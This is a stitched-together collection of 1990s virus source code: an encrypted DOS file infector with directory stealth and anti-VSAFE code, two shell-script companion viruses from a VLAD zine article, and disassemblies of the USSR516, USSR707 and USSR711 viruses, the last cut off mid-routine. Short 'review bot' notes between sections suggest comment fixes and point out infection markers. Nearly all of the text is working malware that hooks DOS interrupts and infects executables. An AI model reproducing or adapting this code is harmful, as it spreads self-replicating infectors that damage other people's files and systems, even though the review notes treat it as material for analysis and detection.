mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
xor word ptr [di],06acdh
not byte ptr [di]
add word ptr [di],04a83h
xor word ptr [di],0c3d7h
dec word ptr [di]
dec byte ptr [di]
not word ptr [di]
sub word ptr [di],0aa17h
xor word ptr [di],0e185h
add byte ptr [di],0b9h
xor byte ptr [di],061h
sub byte ptr [di],075h
xor byte ptr [di],030h
dec word ptr [di]
xor byte ptr [di],022h
dec word ptr [di]
add byte ptr [di],087h
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov cx,50 ;50 beep's!
beep: ;beep label!
mov ax,0E07h ;
int 10h ;print beep char
loop beep ;go!
NO_DAY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
action_dia Db 01fH ;day for the action
action_mes Db 0cH ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start
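Review bot: The comments on three branches state the opposite of what the instruction does, and they sit on the checks an analyst reads first. `jne seguir ;yes! the file is infected!` is taken when the seconds marker is absent, `jne er1 ;yes! is a EXE` is taken when the first word is not 'MZ', and `JE cont ;nop! fuck ret` is taken when the day matches. I would reword them to `; marker absent: not yet infected`, `; not MZ: treat as COM` and `; day matches, check month`. A short header listing the fixed artefacts would also help whoever triages this file: the `AX=0CACAh` INT 21h call that the resident handler answers with `BH=0CAh`, and the seconds field masked against `FECHA` (1Eh), which `cerrar` ORs back into the file time as the infection marker.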
@@ -0,0 +1,63 @@
Lame Unix Viruses
+---------------+
Well, you might have read the title to this article and thought, well
if the damn thing is lame.. why the fuck is it in vlad#4 ?! This can
be answered quite simply, we had one free space! :) It was a bit of
a dilemma to begin with, we had four articles and one space. The problem
was they were all kinda lame. So it was a lame pick of the month episode.
Out of the four articles this was the leastest lamest. Well actually
I don't know about that, but anyway it was the most different one we
had sitting there. Just to prove the title, the author of these
masterpieces asked to remain anonymous to save his reputation.
These "viruses" are the equivalent of a DOS batch file infector because
they are written in shell language. They function similarly to companion
infectors by renaming the original file and replacing it with themselves.
Disinfection is simple by 'mv'ing (moving) the original files back.
Anyway, perhaps someone is interested so here they are. There isn't
much use for them except to annoy your friends when it messes up all
the files in their directory.
+-----------------------------------+
#!/bin/sh
# Dumb Unix Virus
# I dont wanna write anutha dumb unix virus qark, i wont
# Due to excess lameness, dont distribute
# <Author's name withheld for obvious reasons>
for files in *
do
if [ -x files ]
then
if [ ! -d files ]
then
mv files files.EVILVIRUS.HELPME
cp $0 files
chmod +x files
files.EVILVIRUS.HELPME
fi
fi
+-----------------------------------+
cat << _EOF >unix.virus
#!/bin/csh
# Dumber Unix Virus
# by
# SumUtherGuy
foreach i (*)
mv $i bak.$i
cp $0 $i
i >> $i
end
_EOF
+-----------------------------------+
@@ -0,0 +1,278 @@
ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
; This is where the virus really begins
start:
push ax
call beginvir
orig4 db 0cdh, 20h, 0, 0
int30store db 0, 0, 0, 0 ; Actually it's int 21h
; entry point
int21store db 0, 0, 0, 0
beginvir: pop bp ; BP -> orig4
mov si,bp
mov di,103h
add di,[di-2] ; DI -> orig4
movsw ; restore original
movsw ; 4 bytes of program
xor si,si
mov ds,si
les di,dword ptr ds:[21h*4]
mov [bp+8],di ; int21store
mov [bp+0Ah],es
lds di,dword ptr ds:[30h*4+1] ; Bug????
findmarker:
inc di
cmp word ptr [di-2],0E18Ah ; Find marker bytes
jne findmarker ; to the entry point
mov [bp+4],di ; and move to
mov [bp+6],ds ; int30store
mov ax,5252h ; Get list of lists
int 21h ; and also ID check
add bx,12h ; Already installed?
jz quitvir ; then exit
push bx
mov ah,30h ; Get DOS version
int 21h
pop bx ; bx = 12, ptr to 1st
; disk buffer
cmp al,3
je handlebuffer ; if DOS 3
ja handleDBHCH ; if > DOS 3
inc bx ; DOS 2.X, offset is 13
handlebuffer:
push ds
push bx
lds bx,dword ptr [bx] ; Get seg:off of buffer
inc si
pop di
pop es ; ES:DI->seg:off buff
mov ax,[bx] ; ptr to next buffer
cmp ax,0FFFFh ; least recently used?
jne handlebuffer ; if not, go find it
cmp si,3
jbe quitvir
stosw
stosw
jmp short movetobuffer
handleDBHCH: ; Disk Buffer Hash Chain Head array
lds si,dword ptr [bx] ; ptr to disk buffer
lodsw ; info
lodsw ; seg of disk buffer
; hash chain head array
inc ax ; second entry
mov ds,ax
xor bx,bx
mov si,bx
lodsw ; EMS page, -1 if not
; in EMS
xchg ax,di ; save in di
lodsw ; ptr to least recently
; used buffer
mov [di+2],ax ; change disk buffer
; backward offset to
; least recently used
xchg ax,di ; restore EMS page
mov [di],ax ; set to least recently
movetobuffer: ; used
mov di,bx
push ds
pop es ; ES:DI -> disk buffer
push cs
pop ds
mov cx,108h
lea si,[bp-4] ; Copy from start
rep movsw
mov ds,cx ; DS -> interrupt table
mov word ptr ds:[4*21h],0BCh ; New interrupt handler
mov word ptr ds:[4*21h+2],es ; at int21
quitvir:
push cs ; CS = DS = ES
pop es
push es
pop ds
pop ax
mov bx,ax
mov si, 100h ; set up stack for
push si ; the return to the
retn ; original program
int24:
mov al,3 ; Ignore all errors
iret
tickstore db 3 ; Why???
buffer db 3, 0, 9, 0
int21:
pushf
cli ; CP/M style call entry
call dword ptr cs:[int30store-start]
retn ; point of int 21h
int21DSDX: ; For int 21h calls
push ds ; with
lds dx,dword ptr [bp+2] ; DS:DX -> filename
call int21
pop ds
retn
cmp ax,4B00h ; Execute
je Execute
cmp ax,5252h ; ID check
je CheckID
cmp ah,30h ; DOS Version
je DosVersion
callorig21: ; Do other calls
jmp dword ptr cs:[int21store-start]
DosVersion: ; Why????? ; DOS Version
dec byte ptr cs:[tickstore-start]
jnz callorig21 ; Continue if not 0
push es
xor ax,ax
push ax
mov es,ax
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
; since midnight
and al,7 ; MOD 15
inc ax
inc ax
mov cs:[tickstore-start],al ; # 2-17
pop ax
pop es
iret
CheckID: ; ID Check
mov bx,0FFEEh ; FFEEh = -12h
iret
Execute: ; Execute
push ax ; Save registers
push cx
push es
push bx
push ds ; DS:DX -> filename
push dx ; save it on stack
push bp
mov bp,sp ; Set up stack frame
sub sp,0Ah ; Temporary variables
; [bp-A] = attributes
; [bp-8] = int 24 off
; [bp-6] = int 24 seg
; [bp-4] = file time
; [bp-2] = file date
sti
push cs
pop ds
mov ax,3301h ; Turn off ^C check
xor dl,dl ; (never turn it back
call int21 ; on. Bug???)
mov ax,3524h ; Get int 24h
call int21 ; (Critical error)
mov [bp-8],bx
mov [bp-6],es
mov dx,int24-start
mov ax,2524h ; Set to new one
call int21
mov ax,4300h ; Get attributes
call int21DSDX
jnc continue
doneinfect:
mov ax,2524h ; Restore crit error
lds dx,dword ptr [bp-8] ; handler
call int21
cli
mov sp,bp
pop bp
pop dx
pop ds
pop bx
pop es
pop cx
pop ax
jmp short callorig21 ; Call orig handler
continue:
mov [bp-0Ah],cx ; Save attributes
test cl,1 ; Check if r/o????
jz noclearattr
xor cx,cx
mov ax,4301h ; Clear attributes
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Quit on error
noclearattr:
mov ax,3D02h ; Open read/write
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Exit if error
mov bx,ax
mov ax,5700h ; Save time/date
call int21
mov [bp-4],cx
mov [bp-2],dx
mov dx,buffer-start
mov cx,4
mov ah,3Fh ; Read 4 bytes to
call int21 ; buffer
jc quitinf
cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
jne quitinf ; Otherwise, quit
mov dx,word ptr ds:[buffer+1-start]; dx = jmploc
dec dx
xor cx,cx
mov ax,4201h ; go there
call int21
mov ds:[buffer-start],ax ; new location offset
mov dx,orig4-start
mov cx,4
mov ah,3Fh ; Read 4 bytes there
call int21
mov dx,ds:[orig4-start]
cmp dl,0E9h ; 0E9h means we might
jne infect ; already be there
mov ax,ds:[orig4+2-start] ; continue checking
add al,dh ; to see if we really
sub al,ah ; are there.
jz quitinf
infect:
xor cx,cx
mov dx,cx
mov ax,4202h ; Go to EOF
call int21
mov ds:[buffer+2-start],ax ; save filesize
mov cx,204h
mov ah,40h ; Write virus
call int21
jc quitinf ; Exit if error
sub cx,ax
jnz quitinf
mov dx,ds:[buffer-start]
mov ax,ds:[buffer+2-start]
sub ax,dx
sub ax,3 ; AX->jmp offset
mov word ptr ds:[buffer+1-start],ax; Set up buffer
mov byte ptr ds:[buffer-start],0E9h; code the jmp
add al,ah
mov byte ptr ds:[buffer+3-start],al
mov ax,4200h ; Rewind to jmploc
call int21
mov dx, buffer-start
mov cx,4 ; Write in the jmp
mov ah,40h
call int21
quitinf:
mov cx,[bp-4]
mov dx,[bp-2]
mov ax,5701h ; Restore date/time
call int21
mov ah,3Eh ; Close file
call int21
mov cx,[bp-0Ah] ; Restore attributes
mov ax,4301h
call int21DSDX
jmp doneinfect ; Return
ussr516 ends
end stub
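Review bot: Two analyst comments in the `DosVersion` handler misstate the arithmetic: `and al,7` keeps the low three bits of the timer tick byte (0-7), not `MOD 15`, and after the two `inc ax` the value stored to `tickstore` is 2-9, not `# 2-17`. I would reword them to `; low 3 bits (0-7)` and `; # 2-9` so the reload interval of the counter is described correctly. The resident handler body that starts at `cmp ax,4B00h` right after `int21DSDX` also has no label, although the vector write `mov word ptr ds:[4*21h],0BCh` presumably points there. A label such as `newint21:` with a one-line comment would make the hook target findable for anyone writing a detection for it.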
@@ -0,0 +1,408 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ USSR707 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 9-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_7e equ 413h
data_8e equ 1460h
data_9e equ 3
data_10e equ 2
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ussr707 proc far
start:
mov ax,offset loc_2
push ax
retn
loc_2:
jmp short loc_3
nop
ussr707 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
call sub_3
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
pop di
sub di,6
retn
sub_2 endp
db 60h, 14h, 2Bh, 02h, 2Eh, 3Ah
db 26h,0FFh, 0Dh, 00h,0A0h, 00h
db 50h,0C3h, 01h, 2Eh,0A3h,0C0h
db 00h, 9Ch, 00h, 00h, 90h, 90h
db 90h,0CDh
db 20h
loc_3:
call sub_2
mov ah,[di+21h]
mov byte ptr ds:[100h],ah
mov ax,[di+22h]
mov word ptr ds:[101h],ax
mov ax,[di+24h]
mov word ptr ds:[103h],ax
mov ah,30h ; '0'
int 21h ; DOS Services ah=function 30h
; get DOS version number ax
cmp ax,1E03h
je loc_4 ; Jump if equal
jmp loc_9
loc_4:
mov bl,0
mov ax,4BFFh
int 21h ; ??INT Non-standard interrupt
cmp bl,0FFh
jne loc_5 ; Jump if not equal
jmp loc_9
loc_5:
mov ax,ds:data_10e
mov [di+14h],ax
mov bx,di
add bx,0Fh
xor ax,ax ; Zero register
mov es,ax
loc_6:
xor si,si ; Zero register
mov ax,es
inc ax
cmp ax,0FFFh
jbe loc_7 ; Jump if below or =
jmp short loc_9
nop
loc_7:
mov es,ax
loc_8:
mov ah,es:data_8e[si]
cmp ah,[bx+si]
jne loc_6 ; Jump if not equal
inc si
cmp si,5
jne loc_8 ; Jump if not equal
mov [di+0Dh],es
mov word ptr [di+1Fh],0
mov ax,cs
dec ax
mov es,ax
call sub_7
sub si,di
mov ax,si
mov cl,4
shr ax,cl ; Shift w/zeros fill
inc ax
sub es:data_9e,ax
sub ds:data_10e,ax
mov bx,[di+14h]
sub bx,ax
mov es,bx
push di
call sub_4
xor cx,cx ; Zero register
mov ds,cx
mov cl,6
shr ax,cl ; Shift w/zeros fill
inc ax
sub ds:data_7e,ax
mov ax,ds:data_5e
mov cs:[bx+0Bh],ax
mov ax,ds:data_6e
mov cs:[bx+0Dh],ax
push cs
pop ds
mov cx,si
mov si,di
xor di,di ; Zero register
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop di
sub bx,di
add bx,2
xor ax,ax ; Zero register
mov ds,ax
cli ; Disable interrupts
mov ds:data_5e,bx
mov ds:data_6e,es
sti ; Enable interrupts
loc_9:
push cs
pop ds
push cs
pop es
mov ax,offset start
push ax
retn
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
call sub_5
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_5:
pop bx
retn
sub_4 endp
push bx
mov bh,4Bh ; 'K'
cmp bh,ah
je loc_11 ; Jump if equal
pop bx
loc_10:
;* jmp far ptr loc_1
db 0EAh, 93h, 17h, 26h, 0Dh
loc_11:
cmp al,0FFh
jne loc_12 ; Jump if not equal
pop bx
mov bl,0FFh
iret ; Interrupt return
pushf ; Push flags
;* call far ptr sub_1
db 9Ah, 00h, 00h, 00h, 00h
push ax
in al,61h ; port 61h, 8255 port B, read
xor al,3
out 61h,al ; port 61h, 8255 B - spkr, etc
mov al,0B6h
out 43h,al ; port 43h, 8253 wrt timr mode
mov ax,bx
out 42h,al ; port 42h, 8253 timer 2 spkr
mov al,ah
out 42h,al ; port 42h, 8253 timer 2 spkr
pop ax
iret ; Interrupt return
loc_12:
push ax
push cx
push dx
push di
push ds
push es
mov bx,dx
xor di,di ; Zero register
loc_13:
inc di
cmp byte ptr [bx+di],0
jne loc_13 ; Jump if not equal
cmp word ptr [bx+di-2],4D4Fh
je loc_14 ; Jump if equal
jmp loc_26
loc_14:
cmp byte ptr [bx+di-3],43h ; 'C'
je loc_15 ; Jump if equal
jmp loc_26
loc_15:
call sub_2
mov bx,di
add bx,1Ah
mov ax,70h
mov es,ax
xor di,di ; Zero register
loc_16:
inc di
cmp di,0FFFFh
jbe loc_17 ; Jump if below or =
jmp loc_26
loc_17:
xor si,si ; Zero register
loc_18:
mov ah,es:[di]
cmp ah,cs:[bx+si]
jne loc_16 ; Jump if not equal
inc si
inc di
cmp si,5
jne loc_18 ; Jump if not equal
sub di,5
xor ax,ax ; Zero register
mov es,ax
push word ptr es:data_3e
push word ptr es:data_4e
cli ; Disable interrupts
mov es:data_3e,di
mov word ptr es:data_4e,70h
sti ; Enable interrupts
call sub_2
mov bx,dx
xor cx,cx ; Zero register
mov ah,4Eh ; 'N'
call sub_6
jnc loc_19 ; Jump if carry=0
jmp loc_25
loc_19:
mov ah,2Fh ; '/'
call sub_6
mov ax,es:[bx+1Ah]
cmp ax,0F000h
jbe loc_20 ; Jump if below or =
jmp loc_25
loc_20:
push ds
push dx
push word ptr es:[bx+15h]
push word ptr es:[bx+16h]
push word ptr es:[bx+18h]
add ax,100h
mov cs:[di+18h],ax
mov ax,4301h
mov cx,20h
call sub_6
mov ax,3D02h
call sub_6
jnc loc_21 ; Jump if carry=0
jmp short loc_24
nop
loc_21:
push cs
pop ds
mov bx,ax
mov ah,3Fh ; '?'
mov cx,5
mov dx,di
add dx,21h
call sub_6
mov ax,[di+18h]
sub ax,[di+22h]
cmp ax,2C3h
jne loc_23 ; Jump if not equal
cmp byte ptr [di+20h],1Eh
jae loc_22 ; Jump if above or =
inc byte ptr [di+20h]
loc_22:
jmp short loc_24
nop
loc_23:
mov byte ptr [di+17h],0B8h
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_6
mov ah,40h ; '@'
mov cx,3
mov dx,di
add dx,17h
call sub_6
mov ah,40h ; '@'
mov cx,2
mov word ptr [di+17h],0C350h
call sub_6
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_6
mov ah,40h ; '@'
call sub_7
mov cx,si
sub cx,di
mov dx,di
call sub_6
loc_24:
mov ax,5701h
pop dx
pop cx
call sub_6
mov ax,4301h
pop cx
mov ch,0
pop dx
pop ds
call sub_6
mov ah,3Eh ; '>'
call sub_6
loc_25:
xor ax,ax ; Zero register
mov es,ax
cli ; Disable interrupts
pop word ptr es:data_4e
pop word ptr es:data_3e
sti ; Enable interrupts
loc_26:
call sub_2
cmp byte ptr cs:[di+1Fh],0
jne loc_27 ; Jump if not equal
cmp byte ptr cs:[di+20h],1Eh
jb loc_27 ; Jump if below
mov byte ptr cs:[di+1Fh],1
xor ax,ax ; Zero register
mov es,ax
call sub_4
add bx,17h
mov ax,es:data_1e
mov cx,es:data_2e
mov cs:[bx+2],ax
mov cs:[bx+4],cx
cli ; Disable interrupts
mov es:data_1e,bx
mov es:data_2e,cs
sti ; Enable interrupts
loc_27:
pop es
pop ds
pop di
pop dx
pop cx
pop ax
pop bx
jmp loc_10
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_6 proc near
pushf ; Push flags
call dword ptr cs:[di+0Bh]
retn
sub_6 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_7 proc near
call sub_8
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_8:
pop si
add si,5
retn
sub_7 endp
seg_a ends
end start
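Review bot: The comment `??INT Non-standard interrupt` on the `int 21h` call with `ax=4BFFh` under `loc_4` hides what the listing itself shows: the handler at `loc_11` answers `al=0FFh` with `mov bl,0FFh` / `iret`, so this is the sample's own already-resident check. I would comment it as `; residency check: resident copy returns bl=0FFh`, since that call/response pair is the most direct behavioural indicator in the file. The generated equates are equally opaque; where they are used with a zero segment, `data_5e`/`data_6e` (84h/86h) are the int 21h vector, `data_3e`/`data_4e` (4Ch/4Eh) the int 13h vector, `data_1e`/`data_2e` (20h/22h) the int 08h vector, and `data_7e` (413h) the BIOS memory-size word, and a comment per `equ` saying so would let a reader see which vectors are rewritten. The USSR711 section has the same `??INT` comment on `ax=4B04h`, which its handler answers with `ax=44Bh`.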
@@ -0,0 +1,384 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ USSR711 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 9-Feb-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 20h
data_2e equ 22h
data_3e equ 4Ch
data_4e equ 4Eh
data_5e equ 84h
data_6e equ 86h
data_7e equ 0D9h
data_8e equ 0DBh
data_9e equ 122h
data_10e equ 124h
data_11e equ 13Ah
data_12e equ 13Ch
data_13e equ 441h
data_14e equ 3
data_15e equ 12h
data_16e equ 0
data_17e equ 0B0h
data_18e equ 0B2h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ussr711 proc far
start:
jmp loc_1
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
call sub_1
ussr711 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop bx
xor di,di ; Zero register
mov si,bx
sub si,3
mov ax,4B04h
int 21h ; ??INT Non-standard interrupt
cmp ax,44Bh
loc_1:
call sub_2
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_2:
pop bx
xor di,di ; Zero register
mov si,bx
sub si,3
mov ax,4B04h
int 21h ; ??INT Non-standard interrupt
cmp ax,44Bh
je $+7Dh ; Jump if equal
mov ax,es
dec ax
mov es,ax
mov ax,es:data_14e
sub ax,2Ch
mov es:data_14e,ax
sub word ptr es:data_15e,2Ch
nop
mov es,es:data_15e
mov cx,2BBh
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
cli ; Disable interrupts
xor ax,ax ; Zero register
mov ds,ax
mov cx,ds:data_5e
mov es:data_11e,cx
mov cx,ds:data_6e
mov es:data_12e,cx
mov word ptr ds:data_5e,126h
mov ds:data_6e,es
mov cx,ds:data_1e
mov es:data_7e,cx
mov cx,ds:data_2e
mov es:data_8e,cx
mov word ptr ds:data_1e,0B4h
mov ds:data_2e,es
mov cx,ds:data_3e
mov es:data_9e,cx
mov cx,ds:data_4e
mov es:data_10e,cx
mov word ptr ds:data_3e,0DDh
mov ds:data_4e,es
sti ; Enable interrupts
mov di,100h
mov si,bx
add si,2B3h
mov cx,3
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,cs
mov es,ax
mov ds,ax
xor ax,ax ; Zero register
mov si,ax
mov di,0
mov bx,offset start
jmp bx ; Register jump
add bl,[si]
db 67h, 6Fh, 50h, 2Eh,0A1h,0B2h
db 00h, 40h, 2Eh,0A3h,0B2h, 00h
db 2Eh,0A1h,0B0h, 00h, 3Dh, 00h
db 00h, 75h, 10h, 2Eh, 81h, 3Eh
db 0B2h, 00h, 74h, 37h, 75h, 07h
db 0B8h, 02h, 1Ch, 2Eh,0A3h,0B0h
db 00h
db 58h,0EAh, 0Ah, 01h, 49h,0D7h
db 2Eh, 83h, 3Eh,0B0h, 00h, 00h
db 74h, 3Ch, 80h,0FCh, 03h, 74h
db 05h, 80h,0FCh, 0Bh
db 75h, 32h
loc_3:
test dl,80h
js loc_4 ; Jump if sign=1
push ax
mov ax,cs:data_18e
and ax,3
pop ax
jnz loc_4 ; Jump if not zero
push bp
add [bp+si+7Dh],dh
push ax
mov ax,cs
mov ds,ax
mov ax,[bp+6]
push ax
popf ; Pop flags
stc ; Set carry flag
pushf ; Push flags
pop ax
mov [bp+6],ax
xor ax,ax ; Zero register
mov ds,ax
pop ax
mov ah,80h
mov ds:data_13e,ah
pop ds
pop bp
iret ; Interrupt return
loc_4:
;* jmp far ptr loc_20
sub_1 endp
db 0EAh, 49h, 01h, 08h,0D7h
cmp ax,4B04h
jne loc_5 ; Jump if not equal
mov ax,44Bh
iret ; Interrupt return
loc_5:
cmp ax,4B00h
je loc_7 ; Jump if equal
cmp ax,4B03h
je loc_7 ; Jump if equal
loc_6:
;* jmp far ptr loc_19
db 0EAh,0B5h, 02h, 46h,0D5h
loc_7:
push ax
push bx
push cx
push dx
push ds
push es
push si
push di
mov ax,ds
mov es,ax
cld ; Clear direction
mov al,0
mov di,dx
mov cx,0C8h
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
jnz loc_8 ; Jump if not zero
std ; Set direction flag
mov al,2Eh ; '.'
mov cx,0Ah
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
loc_8:
jnz loc_11 ; Jump if not zero
inc di
inc di
mov al,[di]
and al,0DFh
cmp al,43h ; 'C'
jne loc_11 ; Jump if not equal
mov al,[di+1]
and al,0DFh
cmp al,4Fh ; 'O'
jne loc_11 ; Jump if not equal
mov al,[di+2]
and al,0DFh
cmp al,4Dh ; 'M'
jne loc_11 ; Jump if not equal
mov al,[di-2]
and al,0DFh
cmp al,44h ; 'D'
jne loc_9 ; Jump if not equal
mov al,[di-8]
and al,0DFh
cmp al,43h ; 'C'
je loc_11 ; Jump if equal
loc_9:
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get attrb cx, filename @ds:dx
mov word ptr cs:[2B4h],cx
mov cx,20h
mov ax,4301h
